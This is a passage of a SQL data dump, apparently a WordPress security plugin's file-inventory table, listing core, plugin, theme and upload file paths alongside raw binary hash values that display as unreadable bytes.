��y���U{����ԟ��`��]m��','',0,'?'),('�K��@π-�$�Sh','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-nl_NL.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~8�x5i��|LF��','e�Mo�B:>��fϢ\08ߎt9�sU��:�9','',0,'?'),('��[���4��?�s','wp-includes/css/dist/block-library/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�[7�e�C����$�','\rN����X_���hɗz���H�2Tj�','',0,'?'),('�&0�%���K��.�','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-visitor-lockout-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\0����A��','�aĭ�Q���jΞ��{b�!1�I��}\nK�','',0,'?'),('��#V��0��q��R','wp-content/uploads/2016/11/roof-plate-150x150.jpg',0,'��c;�O�b�sU7\n,','��c;�O�b�sU7\n,','�Rk���=W4韊�����v�}$�2F�L���\"�','',0,'?'),('�Ju���Hp������','wp-content/themes/twentytwenty/template-parts/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�q�I���bQbu','6��K��(O�G%)��aq�/�.�q����Ƶ�<4','',0,'?'),('�Ia�\n؎����a','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>\Z��\Z+�,','*y$�MQ[q�:h�\"�)�XTC\0�\\k','',0,'?'),('��{&q�k���5�','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-facebook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X}WUU��3��\n\'�2�','=�D��gSA��P���9_�?�[�����K','',0,'?'),('��O�X���\0�7��','wp-content/plugins/wordpress-seo/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}�s�7��l�>�gWx','-:c���c�6�����Yn\r(�D�eJ.�ϙ','',0,'?'),(' e�حV�M��y�','wp-includes/blocks/rss/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')0�7|��ˢ�H{q','��{o/d�эۘDU__�;z�T���oE��','',0,'?'),('m�qPoD0�*��L','wp-content/plugins/wordfence/lib/wfRESTAPI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\8���H� �mi�+','+��+�Ɵ���0��͂b�=���[㜁��','',0,'?'),('aË=�����V�','wp-content/plugins/wordpress-seo/languages/yoast-components-vi.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A���)2�m`��8','�@��=|\r�.pKhu�N�I��W���2�^6or','',0,'?'),('\Zpe������5\'�<','wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��\\�`q�D@��9�~','1�*z�+z���6���(�c�Vϙ���{Vշ','',0,'?'),(' �,eO���z��Ñ�','wp-includes/customize/class-wp-customize-site-icon-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Uӆ?/[�(\rC��X','(V+���g��]�!�i�}w��š)��5m>-��','',0,'?'),(',5�Xp�BFdc�j+�','wp-includes/js/dist/vendor/lodash.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����]!��8��','���ݒk�\"G�\0���%��e$���û��','',0,'?'),('.�8� �\n\\�d��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/PromisorInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�Gs�=�[ h��','�Tc/Կ��ЍN�� t��O�u��bNy','',0,'?'),('0o���A&dIjn��','wp-content/languages/en_GB-8860e58c20c6a2ab5876a0f07be43bd9.json',0,'l�:n((~G� ��ҊY','l�:n((~G� ��ҊY','Nr���Y�6Ӕ��qǺ����x��gP��lzȖ�q','',0,'?'),('7�c-���kЄ\"�`k','wp-includes/blocks/html/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t\0E�8���P�*j��','�P4WW@��W&&�a$�<j���Ց��Q��','',0,'?'),('8-���j/�XQ\\!�','wp-content/plugins/wordpress-seo/src/builders/indexable-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'�SHЄV��.�','j���a\"Ѝ�v��$K���ǚ/˿�=��g�W�','',0,'?'),('?��%i�V3�ǵ\'�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/bg.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��0��gy����A]�','І��Y�������X\\$�-���l,�����I','',0,'?'),('Q� ��(;ؠ|~R8�b','wp-admin/includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N6TZ.�|���k�','yj� K�o�nU\r)�O#�Ͼ�quܾ��?�j�','',0,'?'),('T�]\\g���4źuP�;','wp-admin/css/admin-menu-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�g�m�9Jud�g�h','�g~�#A��G�B�|�տ��/�zm�+�|�','',0,'?'),('b���p�A�+�-+ʉ','wp-admin/js/widgets/text-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�غ�0��{8IU��ৣ','+k �/�,Z]�.��V��j�|Cۇl��ū','',0,'?'),('�b���͕��+f3�c','wp-includes/blocks/latest-posts/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^Ǿa�\0��lpP;�','w�B�}BnǾ���5����z�MW�$F�Z�}J?�?','',0,'?'),('�< =�q���K�iU','wp-content/plugins/redirection/locale/redirection.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��������r]�L�','`��h\n�r�POї>�\r�A�r���E��cd&�h','',0,'?'),('���%bQ�bM<�x','wp-includes/js/imgareaselect/border-anim-h.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�-6�Yw@�i��=','wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oh�����O<FҬ�','P�J�H���t�Ns��nd*F�\'WW�aq��]','',0,'?'),('�~�zk\'�r;�l��','wp-content/plugins/wordpress-seo/lib/migrations/adapter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�qf�[��B�tn�','hH�M�^�g��&�Ŋg�\n�5DR����:1','',0,'?'),('���0,X���','wp-includes/css/dist/edit-post/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������k�3\n~9�8&','��}�N��v����[�a��(``Э� \"��','',0,'?'),('�qB_ʿ{w�P\"�\\!','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq-questions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`E�2WP�i�','�V deD����2G�i�#fH������','',0,'?'),('�o���?��8|�}','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/en.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϓ+���������^,�','��;����fG\\b��ʸQ���y\\U�X\n�','',0,'?'),('��i)33ܥ��s�*','wp-admin/includes/class-wp-ms-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$Bɀ#ɯ�@b','���Om��Ӕ.x�-�Y�(�VOc�pԮY��','',0,'?'),('hg������O','wp-content/uploads/2016/11/White-Modern-Kitchen-300x177.jpg',0,'x�`�1R���??w�-\r','x�`�1R���??w�-\r','afu��Ҙ~�����S��0K�� �aԼ�,','',0,'?'),('\rP��)�4_\"��\'1','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�܌��ͣ~E||W�r','J�4��5⯷�X���I[�)�*�3=TU�g�K','',0,'?'),('Fq���X��۠;��','wp-content/plugins/wordpress-seo/src/deprecated/frontend/schema/class-schema-faq-question-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1��{�2yE�O-�','���?�qh)����*�v�\"8d�`����\ns*','',0,'?'),('k�\0�`}����4v','wp-content/plugins/wp-cerber/assets/flags/re.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('o��� l�Ѵ�cd','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\n���@Lj�wD�','\r�8�d�������8sڇ���6��F�Ȍ�','',0,'?'),('u�\r:��?��!�\Z�','wp-content/plugins/wordpress-seo/src/config/migrations/20200609154515_AddHasAncestorsColumn.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��z��t�#2��','!)a!�n��X�&�mB2�;����!j','',0,'?'),('��A������]ט','wp-content/plugins/wordpress-seo/admin/admin-settings-changed-listener.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K����5�Mx�:�xpJ','��vG��jX�Yxt9I;���-p�}�y�','',0,'?'),('�Lýf���8=�f�B{','wp-content/plugins/wordpress-seo/inc/class-upgrade-history.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:Pg�ZN��}�K��','z�Q��r�s�Y�Vj���W���Cy�#S�:�h','',0,'?'),('�x��|s����K�a�','wp-content/plugins/wordfence/views/common/page-help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!��YJ��Jk���','��\Z=�DBא�� %%A?O�w��*/�~u','',0,'?'),('���#���� >�7','wp-includes/js/tinymce/skins/wordpress/images/pagebreak.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I��m���LWyݓH','�\rfl�դ/�;l\\��\\.6��r�#P�[��','',0,'?'),('ņL�G��P(�Ή�ȯ','wp-admin/js/widgets/media-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��@�/�a��','�W�I��`6�3�X�Ab�#;r��v���{Mp6','',0,'?'),('�&� A�H��)�I&��','wp-includes/js/dist/vendor/moment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}J�3���p���S�f','��v��[c��e�v;�*WgOAG�@��i&','',0,'?'),('�cY�F���}�j`��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3����b(浏К','n;�<�� Ǖ�-W�t��]��<�s���u�','',0,'?'),('&��2������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/composer-php52.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ylh��w�%Re���','���\njq�W�� �v_�#�� f��~��R�>','',0,'?'),('QL����Ni�ۿ','wp-content/plugins/wordpress-seo/js/dist/analysis-worker-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x����G0�B[�(�ե','���\"�����D��$V=S�%d��ݟ�8�t���','',0,'?'),('#�7��r�Y�\0��i','wp-content/plugins/wordfence/views/common/status-tooltip.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��fZ�؍PIR&i��','�EQtY�=�j.#eW㈤A3QcP��T�','',0,'?'),('&#�p�J��h��','wp-content/plugins/wordfence/views/scanner/site-cleaning-bottom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eT�U���t�)�d!','c ��g:�d�O�z�_fp�5\0��Ɍix','',0,'?'),(',!#Q��P�[;����','wp-includes/sodium_compat/lib/sodium_compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R�P��y�BB&F4','�k������i�]J�� ��ƙ۰Tl��x�','',0,'?'),('4��ہ��;�0�.*','wp-content/plugins/wordfence/views/blocking/country-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(G\"n�rPi�)߬�j','\r�FA�me�a r��-�w�Y�E�u�����u','',0,'?'),(':뭲c��RPe(','wp-includes/rest-api/class-wp-rest-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}h=$�TT�\'5�','9����2�9��&��a�M���,z','',0,'?'),('G5\"�]qm��S�','wp-content/plugins/wordfence/css/dt_table.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gJbj�J��9�k:�','o[P�HyЊ}���iGc�~��<c�D�R:D�','',0,'?'),('K��xP0&���O:p','wp-includes/blocks/archives/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rv}��\')4~~�','Ƹ�C�YM����a.L���8�yQ�v�q�I�','',0,'?'),('T?�,%,�zG%���','wp-content/plugins/wp-cerber/assets/select2/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ABQ,�: ��\r�j','����Z5L�ѾR��9��� `C���)�M','',0,'?'),('e؟�v���笪�Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �UwYI��I�}�','���ݠ\r��ڗU�D�PT���V+6��^:2!���','',0,'?'),('g�<������Y��','wp-content/plugins/wordpress-seo/src/deprecated/src/integrations/third-party/elementor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʚ\Z+7����','n�Q�X��S�����^����u�]�ܮ8cN','',0,'?'),('k\0\Z���{ ݛ6�','wp-includes/rest-api/endpoints/class-wp-rest-comments-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~k�_35=9�*��','��R��)�Vj�v,%�:`���X���O�}�#','',0,'?'),('k����b��gS�','wp-includes/js/tinymce/plugins/wplink/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����6�l�UOaD�Q�','����jT�q�T��I:KZ��a\n�6�U7e��-','',0,'?'),('{�L�7��3TcNE','wp-content/plugins/wordpress-seo/src/conditionals/addon-installation-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>���\0ȭ�TjF�','nՋ\0�K�U�][�U}�C�B����','',0,'?'),('��R$60jw��Im��7','wp-content/plugins/wordpress-seo/admin/import/class-import-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K���9<3(�g�','�T�x���-��P�o����A������','',0,'?'),('����57��D�;TkC','wp-includes/blocks/social-links/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fH�p����W�','�X����`��27�<�)���9�;�Ҳ\n','',0,'?'),('���L��.�\n�w;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E 4m�Y�>�`��','�#�_�[Ѹ��@u�Ha�(+j>V\Z+�q[V','',0,'?'),('����g�~�w\Z�hh','wp-admin/css/themes-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~O���W;�i�<װ��','�X^�8�7�$�p�\\�ۙ4D�mJ\r�5�@�2�N','',0,'?'),('�/�V� X�[�\n�','wp-content/plugins/wp-cerber/assets/flags/cv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#!�C�@���','�#���wQ�u����g���u��w[��ȥ~','',0,'?'),('�����`��4s','wp-content/themes/vega/assets/js/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��T�R���u���','W5?����=5A�~��*�u�M�{�Ț��','',0,'?'),('� \\i����x��(0�','wp-includes/blocks/text-columns/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���u_�<�8��̆Al','!����V����jd^w!�l2ڶ�Z�Rfb%+�ؤ','',0,'?'),('̱w0�L��tP)�','wp-content/plugins/wordpress-seo/languages/wordpress-seojs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gTp������8�)�','ȸ�CW����h�>^�W��k���p��͆�n�H�','',0,'?'),('�F�}��1���','wp-content/plugins/wordpress-seo/admin/class-remote-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�HX�67\"��S&','���d]\Z��+N���f�\\Bb�·(�9�Ү%\Z','',0,'?'),('�ͥ`FJ��S�u','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kz+U��Ÿ(�5\\','8:��o�I�9,��=zDk8;�{A{�\Zij','',0,'?'),('��.�dFY�Gʹ#M','wp-content/plugins/wordpress-seo/src/loader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֲ,Q��JG<��N','�P���O��ı�|�5�`/��~��8�oQ�','',0,'?'),('��bm�%����ڭ֫','wp-includes/Requests/Exception/HTTP/502.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L+��D��/n�cQr','�/���~UJO�.ŀ#��E��5�*�\'C�q','',0,'?'),('�~!��y\"?�����','wp-content/plugins/wordpress-seo/src/presenters/webmaster/pinterest-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','蕑��$���I��','��Y�\r�m��v��RP�A��>�oJa^Gq��','',0,'?'),('�3Ho6�ce�l���','wp-content/plugins/wordpress-seo/css/dist/yoast-components-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C���ZD`EU@O�&mV4','��pw��~7�MIe�HH\n<���g\ZQ��Pp�ڨ','',0,'?'),(' Ғ�Dȏ��S���.','wp-content/languages/en_GB-529362903a5a05b34b06b5e793fb4cf8.json',0,'R됳I������G','R됳I������G','����%5�xB�H^�)�T��E-.�K�a','',0,'?'),(' QW���~-�\0d�','wp-includes/class-phpass.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�8����ؾO','�5�{�dp#��d��3�x`�J4�j~p���','',0,'?'),(' ?������q�uM','wp-includes/js/mediaelement/mediaelementplayer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��5�)��k�y�~','_Dt�3ג�3p��a�;9,�\n�ig���C?3�','',0,'?'),(' ,��/Օ�!�gy�d','wp-includes/js/media-editor.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sq��a:�_::ΗF�.','\0X�n�,�T�P� �QKh&���xFH���u;7','',0,'?'),(' -oؙ��#�/�I','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Rfc7230.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4{ݕ�)�)�y�','Z��I\nV��� {�=�׀�\ZU[v��R�','',0,'?'),(' 2�p�<(X�\"�ݵ�','wp-includes/blocks/audio/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5���3�yb�A�','��@,BW/�R-�M�w������]ٻ','',0,'?'),(' 7�������f `','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�m �8�f�|�Y��','~�%��ۉ�%���>����Bl�o�u�I)ȉ7g','',0,'?'),(' 9��BWGK-�R�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/FnStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�%�C8X�n���',' ��btl��\n�E�)�1�x֬#�����','',0,'?'),(' J�����;uz','wp-includes/sitemaps/class-wp-sitemaps-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dwi�+���M�U','`ߨ=I\\�L����0Z��Y��a�g���5','',0,'?'),(' P=N>��b\"j:~[Q{�','wp-includes/js/tinymce/plugins/wpdialogs/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�We⎆?��N��t','n4��<��Fz������_�5��kig�','',0,'?'),(' X�t\\4vNI5��j��','wp-admin/async-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�#9ou�o<�B���','���`���V�\r�FA�����Y,(�lBA���!','',0,'?'),(' t]�9��\'�����','wp-includes/blocks/nextpage/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �i<�Zҵ�f\r>T','�\r=��G��?\Z���6�!!�o��\ZT�I9�\"U','',0,'?'),(' ���RL��6�L�n�','wp-content/plugins/redirection/locale/redirection-fr_FR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j.�&�y���O���','R���O錱tW�K��5i0�ep�ªVS\"st�','',0,'?'),(' �h�Xk%�>���{N�B','wp-includes/js/dist/viewport.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��K��9A�f��P','�m����I=�}i�ZoEĆ������2�E.�','',0,'?'),(' �.��5ua�WkJ��','wp-includes/Requests/Exception/HTTP/413.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��2ɑI�W�v�MZ','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),(' ��\r�Yk�cJ[��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/StreamWrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ԝ���,|�R��b��','�8���Y|�b��K��K\'\\_�9��o/^R�D[$','',0,'?'),(' ��V��z�Dߊ}k�','wp-content/plugins/wordfence/js/jquery.colorbox.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O�0%6�9�e�3�j','{�L�#�\r��]�\ngL8P,���@��Ir,{ �','',0,'?'),(' ���\'ʻ��k���\Z�','wp-content/uploads/2019/06/fiber-optic-2749588_960_720-300x200.jpg',0,'���@���ݓ��','���@���ݓ��','<���B&d�*��8���TǴ�ѰRF�[�9�m�','',0,'?'),(' �l�q�1T��i��','wp-content/themes/twentynineteen/sass/site/_site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S�@*�D/�\\�I�','��X�m�W����M����K�t�V8Ɗ�','',0,'?'),(' Ӱꅑ��������c','wp-includes/js/dist/escape-html.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' I\\wzzW�~��HO�9','�`�BE`sr�A���I�Hoގ3�_ʘ�%� ','',0,'?'),(' �9��fވU�f���','wp-includes/js/tinymce/tinymce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xl����̡C��kn','�Zk� �6|��{�*\Z��{�H����iܝk^','',0,'?'),(' �)a��x��u���','wp-content/plugins/wp-cerber/assets/flags/sm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�4��f�����u�n','���v-��d1�Y2�0�-�����*�����','',0,'?'),(' ��Ih�B�pO','wp-includes/blocks/heading/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�.�7H��J0B�;','%�u6K���酑&�]*�$t�h_�G-\0t{~','',0,'?'),(' ����09��-b��ͩW','wp-admin/network/users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�Gc���o�_�K','�V� m������y���xՈ{������','',0,'?'),(' �/�?��^��E�Ց','wp-includes/sitemaps/class-wp-sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),(' ��i�AT�Hd��*��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��1z؛d��L','�8�x��\Z݁�[D����A��W/O�wĪ�','',0,'?'),(' �c-^q͗�j� o�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/ClientException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}��7`�cZ���','ti�����n �O/�\"\0kߓ�A/��.��','',0,'?'),('\n��<0�U���<�','wp-content/uploads/2019/08/homeimprovements-300x250.jpg',0,'���>9���\nH��U��','���>9���\nH��U��','�G�X���<N�x�!JS����D\"�����','',0,'?'),('\n� 6��4R�9���','wp-includes/blocks/social-links/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v@��ð��uD���K','}%h�k�8P���`w��w�F�qV��7�J�','',0,'?'),('\n!\r���\Z�7h�H��9�','wp-content/plugins/wordpress-seo/js/dist/externals/searchMetadataPreviews-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�2�N�?�\'�vY�','�n��-;L�Q��y%�(�*�PB<5pn>��','',0,'?'),('\nL�����tHGLN��\r','wp-content/themes/twentytwentyone/assets/css/print.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�H��� �^����|','n��D�ܞgr-}}UN��]4�>*�>Cx�L��','',0,'?'),('\nT��/\\9$Y�U\n��͌','wp-includes/customize/class-wp-widget-form-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�D*@6�{τ}��','�+֓zi���@����^F%5�qZg<��','',0,'?'),('\nZ�V@L�h�z�]\r�','wp-content/uploads/2021/08/building-768815_1920-1536x1023.jpg',0,'# �g��u��(���y','# �g��u��(���y','������F�:�ۄ{p��`v*ֲ� q��','',0,'?'),('\nf���Y��4&�L�','wp-admin/images/se.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ȔB�`��.}\'7:','Y������\"K��{�U���r�:2��JL���','',0,'?'),('\nz�ŭ�}�{�.�u[�','wp-includes/block-supports/generated-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�T������$�5`�','7{���v�>���R�;�^�����4Q�eu','',0,'?'),('\n{X%N8w�2?M4C�','wp-includes/css/dist/format-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ΔYc�s�Mi(�;�','e��+1�u �����!\0 )�uP�/�.��!�~�','',0,'?'),('\n}��\'٩B�3�9�:�','wp-includes/blocks/table/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�����d�O+5j�=','\ZDa��:�9�$��������\ZL�l�l','',0,'?'),('\n���u�/��M�I�r','wp-content/plugins/wordpress-seo/js/dist/externals/socialMetadataForms-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1��MF*�����',']��k$�a����qP��C��\0O{W�Q1��ӥ','',0,'?'),('\n����P�r8���4S�3','wp-content/aiowps_backups/.htaccess.backup',0,'n�s>���b���ؿ','n�s>���b���ؿ','\r`=D�gH>�Q�m��\"1���q��-�nѪ���','',0,'?'),('\n�ؾ��m,A�>��bG','wp-content/plugins/wordpress-seo/packages/js/images/local_assistant.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�e]|��y�d�','��u�z{jë|_O\r�G�w\"\r�\0�8��5L','',0,'?'),('\n�A\0>�+�^�\rm�q','wp-content/themes/vega/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�\'1�/����D�','NeU#wR����W�Q8̩T�������`��]�','',0,'?'),('\n���f�Ӆ;{�t��','wp-includes/class-wp-role.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yH���,o�:���','\'}ؑ9��X8u���ߨ�[(o�a�n\\�','',0,'?'),('\n��\'�G�~R*��dj�','wp-content/plugins/redirection/models/action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����0kӂY�','I�\01���씟��>7t�)\"�\rϰ�w��K','',0,'?'),('\n��B�/��ޕ6h9g','wp-content/plugins/wp-cerber/languages/wp-cerber-pt_PT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iՍf��lFb�\Z��','C��S3n��w_��#m٠!!R�_�����2','',0,'?'),('\n���b-�V�:��|m��','wp-admin/edit-link-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S��Zeq�i�[��\rv','[��ϣb]�9�\\�|��ֲ*V\r�~��z�^','',0,'?'),('\n�����#���x|]','wp-includes/blocks/site-tagline/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',=��SPE��ҧ��','ʈ� �ؿߥ��~��E��k��,f����f�R','',0,'?'),('\n��NNM��ۑ4;�p�4','wp-includes/js/customize-models.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�o�ϱ;��Rwc','.a���x��^�g[&�E�ΡJJ�T�SՀ�','',0,'?'),('\n���Q��wЗƼ��','wp-content/plugins/wordpress-seo/src/actions/indexing/post-link-indexing-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B=�¨��#����y','{.�/�s�@� �PSZ!��~�i��)��3','',0,'?'),('\n� �e�.!�`Y��ۗ�','wp-content/uploads/2019/08/homeimprovements-updraft-pre-smush-original.jpg',0,'��!f�� �6�0�>','��!f�� �6�0�>','ܝ�̡e&{�8��lDw. 